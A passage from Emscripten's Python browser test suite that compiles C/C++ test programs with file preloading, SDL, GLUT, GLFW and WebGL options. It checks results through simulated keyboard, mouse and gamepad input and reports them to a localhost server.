self.compile_btest(['main.c', '--use-preload-cache', '--js-library', 'test.js', '--preload-file', 'somefile.txt', '-o', 'page.html', '-s', 'ALLOW_MEMORY_GROWTH'], reporting=Reporting.JS_ONLY)
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?exit:0')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?exit:1')
def test_preload_caching_indexeddb_name(self):
self.set_setting('EXIT_RUNTIME')
create_file('somefile.txt', '''load me right before running the code please''')
def make_main(path):
print(path)
create_file('main.c', r'''
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern int checkPreloadResults();
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
assert(strcmp("load me right before", buf) == 0);
return checkPreloadResults();
}
''' % path)
create_file('test.js', '''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
make_main('somefile.txt')
self.run_process([FILE_PACKAGER, 'somefile.data', '--use-preload-cache', '--indexedDB-name=testdb', '--preload', 'somefile.txt', '--js-output=' + 'somefile.js'])
self.compile_btest(['main.c', '--js-library', 'test.js', '--pre-js', 'somefile.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM'], reporting=Reporting.JS_ONLY)
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?exit:0')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?exit:1')
def test_multifile(self):
# a few files inside a directory
ensure_dir('subdirr/moar')
create_file('subdirr/data1.txt', '1214141516171819')
create_file('subdirr/moar/data2.txt', '3.14159265358979')
create_file('main.c', r'''
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
assert(strcmp("1214141516171819", buf) == 0);
FILE *f2 = fopen("subdirr/moar/data2.txt", "r");
fread(buf, 1, 16, f2);
buf[16] = 0;
fclose(f2);
printf("|%s|\n", buf);
assert(strcmp("3.14159265358979", buf) == 0);
return 0;
}
''')
# by individual files
self.btest_exit('main.c', args=['--preload-file', 'subdirr/data1.txt', '--preload-file', 'subdirr/moar/data2.txt'])
# by directory, and remove files to make sure
self.set_setting('EXIT_RUNTIME')
self.compile_btest(['main.c', '--preload-file', 'subdirr', '-o', 'page.html'], reporting=Reporting.JS_ONLY)
shutil.rmtree('subdirr')
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?exit:0')
def test_custom_file_package_url(self):
# a few files inside a directory
ensure_dir('subdirr')
ensure_dir('cdn')
create_file(Path('subdirr/data1.txt'), '1214141516171819')
# change the file package base dir to look in a "cdn". note that normally
# you would add this in your own custom html file etc., and not by
# modifying the existing shell in this manner
default_shell = read_file(path_from_root('src/shell.html'))
create_file('shell.html', default_shell.replace('var Module = {', '''
var Module = {
locateFile: function(path, prefix) {
if (path.endsWith(".wasm")) {
return prefix + path;
} else {
return "cdn/" + path;
}
},
'''))
create_file('main.c', r'''
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
assert(strcmp("1214141516171819", buf) == 0);
return 0;
}
''')
self.set_setting('EXIT_RUNTIME')
self.compile_btest(['main.c', '--shell-file', 'shell.html', '--preload-file', 'subdirr/data1.txt', '-o', 'test.html'], reporting=Reporting.JS_ONLY)
shutil.move('test.data', Path('cdn/test.data'))
self.run_browser('test.html', '', '/report_result?exit:0')
def test_missing_data_throws_error(self):
def setup(assetLocalization):
self.clear()
create_file('data.txt', 'data')
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
// This code should never be executed in terms of missing required dependency file.
return 0;
}
''')
create_file('on_window_error_shell.html', r'''
<html>
<center><canvas id='canvas' width='256' height='256'></canvas></center>
<hr><div id='output'></div><hr>
<script type='text/javascript'>
window.onerror = function(error) {
window.onerror = null;
var result = error.indexOf("test.data") >= 0 ? 1 : 0;
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:8888/report_result?' + result, true);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}
var Module = {
locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "''' + assetLocalization + r'''" + path;}},
print: (function() {
var element = document.getElementById('output');
return function(text) { element.innerHTML += text.replace('\n', '<br>', 'g') + '<br>';};
})(),
canvas: document.getElementById('canvas')
};
</script>
{{{ SCRIPT }}}
</body>
</html>''')
def test():
# test test missing file should run xhr.onload with status different than 200, 304 or 206
setup("")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
shutil.move('test.data', 'missing.data')
self.run_browser('test.html', '', '/report_result?1')
# test unknown protocol should go through xhr.onerror
setup("unknown_protocol://")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
self.run_browser('test.html', '', '/report_result?1')
# test wrong protocol and port
setup("https://localhost:8800/")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
self.run_browser('test.html', '', '/report_result?1')
test()
# TODO: CORS, test using a full url for locateFile
# create_file('shell.html', read_file(path_from_root('src/shell.html')).replace('var Module = {', 'var Module = { locateFile: function (path) {return "http:/localhost:8888/cdn/" + path;}, '))
# test()
def test_dev_random(self):
self.btest_exit(Path('filesystem/dev_random.cpp'))
def test_sdl_swsurface(self):
self.btest_exit('sdl_swsurface.c', args=['-lSDL', '-lGL'])
def test_sdl_surface_lock_opts(self):
# Test Emscripten-specific extensions to optimize SDL_LockSurface and SDL_UnlockSurface.
self.btest('hello_world_sdl.cpp', reference='htmltest.png', message='You should see "hello, world!" and a colored cube.', args=['-DTEST_SDL_LOCK_OPTS', '-lSDL', '-lGL'])
def test_sdl_image(self):
# load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpg')
src = test_file('sdl_image.c')
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
self.btest_exit(src, args=[
'-O2', '-lSDL', '-lGL', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '--use-preload-plugins'
])
@also_with_wasmfs
def test_sdl_image_jpeg(self):
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpeg')
src = test_file('sdl_image.c')
self.btest_exit(src, args=[
'-lSDL', '-lGL',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '--use-preload-plugins'
])
def test_sdl_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'], also_proxied=True, manually_trigger_reftest=True)
@parameterized({
'': ([],),
# add testing for closure on preloaded files + ENVIRONMENT=web (we must not
# emit any node.js code here, see
# https://github.com/emscripten-core/emscripten/issues/14486
'closure_webonly': (['--closure', '1', '-s', 'ENVIRONMENT=web'],)
})
def test_sdl_image_prepare_data(self, args):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'] + args, manually_trigger_reftest=True)
def test_sdl_image_must_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpg')
self.btest('sdl_image_must_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.jpg', '-lSDL', '-lGL'], manually_trigger_reftest=True)
def test_sdl_stb_image(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_bpp(self):
# load grayscale image without alpha
self.clear()
shutil.copyfile(test_file('sdl-stb-bpp1.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp1.png', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load grayscale image with alpha
self.clear()
shutil.copyfile(test_file('sdl-stb-bpp2.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp2.png', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGB image
self.clear()
shutil.copyfile(test_file('sdl-stb-bpp3.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp3.png', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGBA image
self.clear()
shutil.copyfile(test_file('sdl-stb-bpp4.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp4.png', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_data(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image_data.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_cleanup(self):
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest_exit('sdl_stb_image_cleanup.c', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL', '--memoryprofiler'])
def test_sdl_canvas(self):
self.clear()
self.btest_exit('sdl_canvas.c', args=['-s', 'LEGACY_GL_EMULATION', '-lSDL', '-lGL'])
# some extra coverage
self.clear()
self.btest_exit('sdl_canvas.c', args=['-s', 'LEGACY_GL_EMULATION', '-O0', '-s', 'SAFE_HEAP', '-lSDL', '-lGL'])
self.clear()
self.btest_exit('sdl_canvas.c', args=['-s', 'LEGACY_GL_EMULATION', '-O2', '-s', 'SAFE_HEAP', '-lSDL', '-lGL'])
def post_manual_reftest(self, reference=None):
self.reftest(test_file(self.reference if reference is None else reference))
html = read_file('test.html')
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % read_file('reftest.js'))
create_file('test.html', html)
def test_sdl_canvas_proxy(self):
create_file('data.txt', 'datum')
self.btest('sdl_canvas_proxy.c', reference='sdl_canvas_proxy.png', args=['--proxy-to-worker', '--preload-file', 'data.txt', '-lSDL', '-lGL'], manual_reference=True, post_build=self.post_manual_reftest)
@requires_graphics_hardware
def test_glgears_proxy_jstarget(self):
# test .js target with --proxy-worker; emits 2 js files, client and worker
self.compile_btest([test_file('hello_world_gles_proxy.c'), '-o', 'test.js', '--proxy-to-worker', '-s', 'GL_TESTING', '-lGL', '-lglut'])
shell_with_script('shell_minimal.html', 'test.html', '<script src="test.js"></script>')
self.post_manual_reftest('gears.png')
self.run_browser('test.html', None, '/report_result?0')
def test_sdl_canvas_alpha(self):
# N.B. On Linux with Intel integrated graphics cards, this test needs Firefox 49 or newer.
# See https://github.com/emscripten-core/emscripten/issues/4069.
create_file('flag_0.js', '''
Module['arguments'] = ['-0'];
''')
self.btest('sdl_canvas_alpha.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_alpha.png', reference_slack=12)
self.btest('sdl_canvas_alpha.c', args=['--pre-js', 'flag_0.js', '-lSDL', '-lGL'], reference='sdl_canvas_alpha_flag_0.png', reference_slack=12)
def test_sdl_key(self):
for delay in [0, 1]:
for defines in [
[],
['-DTEST_EMSCRIPTEN_SDL_SETEVENTHANDLER']
]:
for async_ in [
[],
['-DTEST_SLEEP', '-s', 'ASSERTIONS', '-s', 'SAFE_HEAP', '-s', 'ASYNCIFY']
]:
print(delay, defines, async_)
create_file('pre.js', '''
function keydown(c) {
%s
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
%s
}
function keyup(c) {
%s
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
%s
}
''' % ('setTimeout(function() {' if delay else '', '}, 1);' if delay else '', 'setTimeout(function() {' if delay else '', '}, 1);' if delay else ''))
self.compile_btest([test_file('sdl_key.c'), '-o', 'page.html'] + defines + async_ + ['--pre-js', 'pre.js', '-s', 'EXPORTED_FUNCTIONS=_main', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?223092870')
def test_sdl_key_proxy(self):
create_file('pre.js', '''
var Module = {};
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
''')
def post():
html = read_file('test.html')
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
keydown(1250);keydown(38);keyup(38);keyup(1250); // alt, up
keydown(1248);keydown(1249);keydown(40);keyup(40);keyup(1249);keyup(1248); // ctrl, shift, down
keydown(37);keyup(37); // left
keydown(39);keyup(39); // right
keydown(65);keyup(65); // a
keydown(66);keyup(66); // b
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
create_file('test.html', html)
self.btest('sdl_key_proxy.c', '223092870', args=['--proxy-to-worker', '--pre-js', 'pre.js', '-s', 'EXPORTED_FUNCTIONS=_main,_one', '-lSDL', '-lGL'], manual_reference=True, post_build=post)
def test_canvas_focus(self):
self.btest_exit('canvas_focus.c')
def test_keydown_preventdefault_proxy(self):
def post():
html = read_file('test.html')
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function keypress(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function sendKey(c) {
// Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
if (keydown(c) === false) {
console.log('keydown prevent defaulted, NOT sending keypress!!!');
} else {
keypress(c);
}
keyup(c);
}
// Send 'a'. Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
sendKey(65);
// Send backspace. Keypress should not be sent over as default handling of
// the Keydown event should be prevented.
sendKey(8);
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
create_file('test.html', html)
self.btest('keydown_preventdefault_proxy.cpp', '300', args=['--proxy-to-worker', '-s', 'EXPORTED_FUNCTIONS=_main'], manual_reference=True, post_build=post)
def test_sdl_text(self):
create_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.body.dispatchEvent(event);
}
''')
self.compile_btest([test_file('sdl_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-s', 'EXPORTED_FUNCTIONS=_main,_one', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse(self):
create_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
self.compile_btest([test_file('sdl_mouse.c'), '-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse_offsets(self):
create_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_file('page.html', '''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl_mouse.js"></script>
</body>
</html>
''')
self.compile_btest([test_file('sdl_mouse.c'), '-DTEST_SDL_MOUSE_OFFSETS', '-O2', '--minify=0', '-o', 'sdl_mouse.js', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_glut_touchevents(self):
self.btest_exit('glut_touchevents.c', args=['-lglut'])
def test_glut_wheelevents(self):
self.btest_exit('glut_wheelevents.c', args=['-lglut'])
@requires_graphics_hardware
def test_glut_glutget_no_antialias(self):
self.btest_exit('glut_glutget.c', args=['-lglut', '-lGL'])
self.btest_exit('glut_glutget.c', args=['-lglut', '-lGL', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED'])
# This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer.
@requires_graphics_hardware
def test_glut_glutget(self):
self.btest_exit('glut_glutget.c', args=['-lglut', '-lGL'])
self.btest_exit('glut_glutget.c', args=['-lglut', '-lGL', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED'])
def test_sdl_joystick_1(self):
# Generates events corresponding to the Working Draft of the HTML5 Gamepad API.
# http://www.w3.org/TR/2012/WD-gamepad-20120529/#gamepad-interface
create_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = 0;
};
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button] = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button] = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
self.btest_exit('sdl_joystick.c', args=['-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
def test_sdl_joystick_2(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
create_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
self.btest_exit('sdl_joystick.c', args=['-O2', '--minify=0', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_glfw_joystick(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
create_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
var gamepad = {
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
};
gamepads.push(gamepad)
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
// Dispatch event (required for glfw joystick; note not used in SDL test)
var event = new Event('gamepadconnected');
event.gamepad = gamepad;
window.dispatchEvent(event);
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
self.btest_exit(test_file('test_glfw_joystick.c'), args=['-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-lGL', '-lglfw3', '-s', 'USE_GLFW=3'])
@requires_graphics_hardware
def test_webgl_context_attributes(self):
# Javascript code to check the attributes support we want to test in the WebGL implementation
# (request the attribute, create a context and check its value afterwards in the context attributes).
# Tests will succeed when an attribute is not supported.
create_file('check_webgl_attributes_support.js', '''
mergeInto(LibraryManager.library, {
webglAntialiasSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {antialias: true});
attributes = context.getContextAttributes();
return attributes.antialias;
},
webglDepthSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {depth: true});
attributes = context.getContextAttributes();
return attributes.depth;
},
webglStencilSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {stencil: true});
attributes = context.getContextAttributes();
return attributes.stencil;
},
webglAlphaSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {alpha: true});
attributes = context.getContextAttributes();
return attributes.alpha;
}
});
''')
# Copy common code file to temporary directory
filepath = test_file('test_webgl_context_attributes_common.c')
temp_filepath = os.path.basename(filepath)
shutil.copyfile(filepath, temp_filepath)
# perform tests with attributes activated
self.btest_exit('test_webgl_context_attributes_glut.c', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglut', '-lGLEW'])
self.btest_exit('test_webgl_context_attributes_sdl.c', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lSDL', '-lGLEW'])
self.btest_exit('test_webgl_context_attributes_sdl2.c', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-s', 'USE_SDL=2', '-lGLEW'])
self.btest_exit('test_webgl_context_attributes_glfw.c', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglfw', '-lGLEW'])
# perform tests with attributes desactivated
self.btest_exit('test_webgl_context_attributes_glut.c', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglut', '-lGLEW'])
self.btest_exit('test_webgl_context_attributes_sdl.c', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lSDL', '-lGLEW'])
self.btest_exit('test_webgl_context_attributes_glfw.c', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglfw', '-lGLEW'])
@requires_graphics_hardware
def test_webgl_no_double_error(self):
self.btest_exit('webgl_error.cpp')
@requires_graphics_hardware
def test_webgl_parallel_shader_compile(self):
self.btest_exit('webgl_parallel_shader_compile.cpp')
@requires_graphics_hardware
def test_webgl_explicit_uniform_location(self):
self.btest_exit('webgl_explicit_uniform_location.c', args=['-s', 'GL_EXPLICIT_UNIFORM_LOCATION=1', '-s', 'MIN_WEBGL_VERSION=2'])
@requires_graphics_hardware
def test_webgl_sampler_layout_binding(self):
self.btest_exit('webgl_sampler_layout_binding.c', args=['-s', 'GL_EXPLICIT_UNIFORM_BINDING=1'])
@requires_graphics_hardware
def test_webgl2_ubo_layout_binding(self):
self.btest_exit('webgl2_ubo_layout_binding.c', args=['-s', 'GL_EXPLICIT_UNIFORM_BINDING=1', '-s', 'MIN_WEBGL_VERSION=2'])
# Test that -s GL_PREINITIALIZED_CONTEXT=1 works and allows user to set Module['preinitializedWebGLContext'] to a preinitialized WebGL context.
@requires_graphics_hardware
def test_preinitialized_webgl_context(self):
self.btest_exit('preinitialized_webgl_context.cpp', args=['-s', 'GL_PREINITIALIZED_CONTEXT', '--shell-file', test_file('preinitialized_webgl_context.html')])
@requires_threads
def test_emscripten_get_now(self):
for args in [[], ['-s', 'USE_PTHREADS'], ['-s', 'ENVIRONMENT=web', '-O2', '--closure=1']]:
self.btest_exit('emscripten_get_now.cpp', args=args)
def test_write_file_in_environment_web(self):
self.btest_exit('write_file.c', args=['-s', 'ENVIRONMENT=web', '-Os', '--closure=1'])
def test_fflush(self):
self.btest('test_fflush.cpp', '0', args=['-s', 'EXIT_RUNTIME', '--shell-file', test_file('test_fflush.html')], reporting=Reporting.NONE)
def test_file_db(self):
secret = str(time.time())
create_file('moar.txt', secret)
self.btest('file_db.cpp', '1', args=['--preload-file', 'moar.txt', '-DFIRST'])
shutil.copyfile('test.html', 'first.html')
self.btest('file_db.cpp', secret, args=['-s', 'FORCE_FILESYSTEM'])
shutil.copyfile('test.html', 'second.html')
create_file('moar.txt', 'aliantha')
self.btest('file_db.cpp', secret, args=['--preload-file', 'moar.txt']) # even with a file there, we load over it
shutil.move('test.html', 'third.html')
def test_fs_idbfs_sync(self):
for extra in [[], ['-DEXTRA_WORK']]:
secret = str(time.time())
self.btest(test_file('fs/test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', 'EXPORTED_FUNCTIONS=_main,_test,_success', '-lidbfs.js'])
self.btest(test_file('fs/test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-s', 'EXPORTED_FUNCTIONS=_main,_test,_success', '-lidbfs.js'] + extra)
def test_fs_idbfs_sync_force_exit(self):
secret = str(time.time())
